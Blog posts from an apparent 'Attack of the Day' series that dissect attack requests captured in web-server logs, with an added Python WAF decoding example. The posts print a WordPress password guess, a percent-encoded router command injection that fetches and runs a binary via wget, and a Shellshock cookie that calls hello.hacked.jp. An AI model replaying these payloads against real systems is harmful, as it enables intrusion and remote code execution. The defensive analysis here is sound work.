Whoops! They did it again.

Posted in Attack of the Day

This person looks like they may have purchased some tools from someone and didn’t fully comprehend what it took to configure things. Maybe they thought tools.ua.random was a real user-agent? Who knows..

    POST
    User-Agent: [% tools.ua.random() %]
    Connection: close
    Content-Length: 115
    Host: www.planetspork.com
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: http://www.planetspork.com/w/wp-login.php
    X-Forwarded-For: 31.193.192.184

    log=admin&pwd=scooby&wp-submit=Log%20In&redirect_to=http%3A%2F%2Fwww.planetspork.com%2Fw%2Fwp-admin%2F&testcookie=1

Two points for password creativity, although I’m more of a Shaggy fan, really..

Say What You Mean

Posted in Attack of the Day

** Standard Warnings Apply **

Let me help you understand.. This showed up in the logs today as a curious request. Not much more than an exceedingly long encoded request, but a good example of why string normalization is a useful feature in a WebApp firewall.

    POST /tmUnblock.cgi HTTP/1.1
    content-length: 1030
    X-Forwarded-For: 200.29.229.3

    %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%30%37%34%30%35%63%33%36%20%68%74%74%70%3a%2f%2f%32%30%30%2e%32%39%2e%32%32%39%2e%33%3a%33%32%30%30%22%20%3e%3e%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%30%37%34%30%35%63%33%36%22%20%3e%3e%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%30%37%34%30%35%63%33%36%22%20%3e%3e%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2e%30%37%34%30%35%63%33%36%22%20%3e%3e%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%2e%2f%2e%30%37%34%30%35%63%33%36%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31

Since this request used characters besides %20, I couldn’t immediately look at it to determine what they wanted.. They would have been more successful asking me in English, but I digress. A quick decode shows they actually wanted to […]
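
The normalization step the post credits the WebApp firewall with, as an added example (this is not code from the original post): a small Python pass that percent-decodes each form field, repeating the decode to unwrap double encoding, and only then matches rules against the readable text. The request bodies and the rule list are constructed for illustration; the field names echo the post's request but the values do not reproduce its payload.

```python
# Added example (not code from the original post): a WAF-style normalization
# pass that percent-decodes a form body so it can be inspected in plain text.
# Every request body and the rule list below are constructed for illustration.
import re
from urllib.parse import unquote_to_bytes

MAX_ROUNDS = 3  # cap on decode rounds so nested encodings cannot loop forever

# Illustrative tokens a post-normalization rule might match: shell
# metacharacters and a few command words. Not a production ruleset.
SUSPICIOUS = re.compile(r"[`;|&$]|\b(?:wget|curl|chmod|sh|bash)\b")


def normalize(raw: str, max_rounds: int = MAX_ROUNDS):
    """Percent-decode `raw` until it stops changing, or max_rounds is hit.

    Returns (decoded_text, rounds_used). '+' is mapped to a space first,
    as in application/x-www-form-urlencoded bodies; decoding repeats so that
    double-encoded sequences such as %2560 (-> %60 -> backtick) are unwrapped.
    """
    current = raw.replace("+", " ")
    for rounds in range(1, max_rounds + 1):
        decoded = unquote_to_bytes(current).decode("utf-8", "replace")
        if decoded == current:
            return current, rounds - 1
        current = decoded
    return current, max_rounds


def inspect_body(raw_body: str):
    """Split the body on & and = *before* decoding (so an encoded & inside a
    value cannot create a bogus field), normalize each value, and report every
    field whose decoded value matches SUSPICIOUS."""
    findings = []
    for pair in raw_body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        field, _ = normalize(key)
        decoded, rounds = normalize(value)
        hits = sorted({m.group(0) for m in SUSPICIOUS.finditer(decoded)})
        if hits:
            findings.append({"field": field, "decoded": decoded,
                             "rounds": rounds, "hits": hits})
    return findings


# Constructed sample bodies. The first hides a backtick-quoted command inside
# the ttcp_ip field; the second is double-encoded and needs two decode rounds.
SAMPLE_BODY = "submit_button=&ttcp_num=2&ttcp_ip=%2d%68%20%60%65%63%68%6f%20%68%69%60"
DOUBLE_ENCODED_BODY = "cmd=%2560wget%2560"

if __name__ == "__main__":
    for body in (SAMPLE_BODY, DOUBLE_ENCODED_BODY):
        for f in inspect_body(body):
            print(f"{f['field']}: {f['decoded']!r} "
                  f"(decoded in {f['rounds']} round(s), hits {f['hits']})")
```

Two design points worth noting: the body is split into fields before any decoding, because decoding first would let an encoded `&` or `=` inside a value manufacture extra fields and confuse the parser; and the decode loop is bounded, since an unbounded "decode until stable" loop is itself a cheap denial-of-service target.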

Clever Domain Name

Posted in Attack of the Day

Saw this get flagged on Friday. The domain “hacked.jp” showing up in a questionable HTTP request kind of indicates the owner really thought through their plans.

    GET /cgi-sys/entropysearch.cgi HTTP/1.1
    Content-Type: text/html
    Cookie: () { x;};echo;/bin/bash -c "php -r \"file_get_contents('http://hello.hacked.jp/hello/?l=planetspork.com');\""
    Host: planetspork.com
    Accept: text/html, */*
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19
    X-Forwarded-For: 77.79.40.195

A guy might be curious what lived at hello.hacked.jp; I know I was.

    Lappy486:arf imhoff$ telnet hello.hacked.jp 80
    Trying 31.184.192.233...
    Connected to hello.hacked.jp.
    Escape character is '^]'.
    GET /hello/?l=planetspork.com HTTP/1.0

    HTTP/1.1 […]